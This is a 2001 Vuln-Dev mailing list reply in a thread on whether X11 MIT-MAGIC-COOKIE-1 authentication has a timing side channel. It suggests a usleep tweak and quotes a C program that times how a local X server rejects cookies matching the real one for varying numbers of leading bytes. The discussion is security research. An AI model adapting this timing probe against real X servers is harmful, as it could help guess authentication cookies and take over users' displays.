Vulnerability Development mailing list archives
Re: Is there a hidden channel in X authentication?
From: wwieser () gmx de
Date: Sun, 27 May 2001 14:17:23 +0200
Did you try to insert a usleep(1) before the writev() syscall? This _might_ narrow down the noise as the last timer interrupt is just done when usleep returns (On i386, the time resolution is 1/100s = 10000usec; AFAIK usleep will not sleep shorter than time resolution.) wwieser On Tuesday 22 May 2001 00:28, Pavel Kankovsky wrote:
<--snip--> cookie.c (X11 test): <--snip--> #include <stdio.h> #include <string.h> #include <sys/uio.h> #include <sys/socket.h> #include <sys/un.h> /* taken from Linux kernel */ #define rdtsc(low, high) \ __asm__ __volatile__("rdtsc" : "=a" (low), "=d" (high)) #define sub64(xlow, xhigh, ylow, yhigh) \ __asm__("subl %2,%0\n\tsbbl %3,%1" \ :"=a" (xlow), "=d" (xhigh) \ :"g" (ylow), "g" (yhigh), \ "0" (xlow), "1" (xhigh)) unsigned long measure(int dpy, const char *cookie) { unsigned long startlo, starthi; unsigned long endlo, endhi; int s, r; char c; struct iovec vec[4]; struct sockaddr_un sun; vec[0].iov_base = "l\0\v\0\0\0\22\0\20\0\0\0"; vec[0].iov_len = 12; vec[1].iov_base = "MIT-MAGIC-COOKIE-1"; vec[1].iov_len = 18; vec[2].iov_base = "\0\0"; vec[2].iov_len = 2; vec[3].iov_base = (char *) cookie; vec[3].iov_len = 16; s = socket(AF_UNIX, SOCK_STREAM, 0); if (s < 0) return ~0UL; sun.sun_family = AF_UNIX; sprintf(sun.sun_path, "/tmp/.X11-unix/X%d", dpy); r = connect(s, (struct sockaddr *) &sun, sizeof(sun)); if (r < 0) { close(s); return ~0UL; }
usleep(1);
rdtsc(startlo, starthi); (void) writev(s, vec, 4); (void) read(s, &c, 1); rdtsc(endlo, endhi); sub64(endlo, endhi, startlo, starthi); close(s); if (endhi) return ~0UL; /* argh */ return endlo; } int main() { char a[16], b[16]; int i, j, count; unsigned long ta, tb, tmin, t1; for (j = 0; j < sizeof(a); ++j) a[j] = j; for (i = 0; i <= sizeof(a); ++i) { for (j = 0; j < i; ++j) b[j] = a[j]; for (; j < sizeof(a); ++j) b[j] = ~a[j]; count = 100000; ta = tb = 0; tmin = ~0UL; for (j = 0; j < count; ) { t1 = measure(99, b); if (t1 == ~0UL) continue; if (t1 < tmin) tmin = t1; tb += t1 % count; if (tb >= count) { ++ta; tb -= count; } ta += t1 / count; ++j; } printf("%2d %10lu %10lu\n", i, ta, tmin); } return 0; }
Current thread:
- Is there a hidden channel in X authentication? Klaus Frank (May 17)
- Re: Is there a hidden channel in X authentication? Matt Conover (May 21)
- Re: Is there a hidden channel in X authentication? Pavel Kankovsky (May 21)
- Re: Is there a hidden channel in X authentication? Klaus Frank (May 22)
- Re: Is there a hidden channel in X authentication? David Wagner (May 22)
- Re: Is there a hidden channel in X authentication? Martin Rex (May 23)
- Re: Is there a hidden channel in X authentication? wwieser (May 27)
- Re: Is there a hidden channel in X authentication? Pavel Kankovsky (May 28)
- <Possible follow-ups>
- RE: Is there a hidden channel in X authentication? Michael Wojcik (May 21)
- RE: Is there a hidden channel in Xauthentication? Klaus Frank (May 22)
- Re: Is there a hidden channel in X authentication? David Wagner (May 22)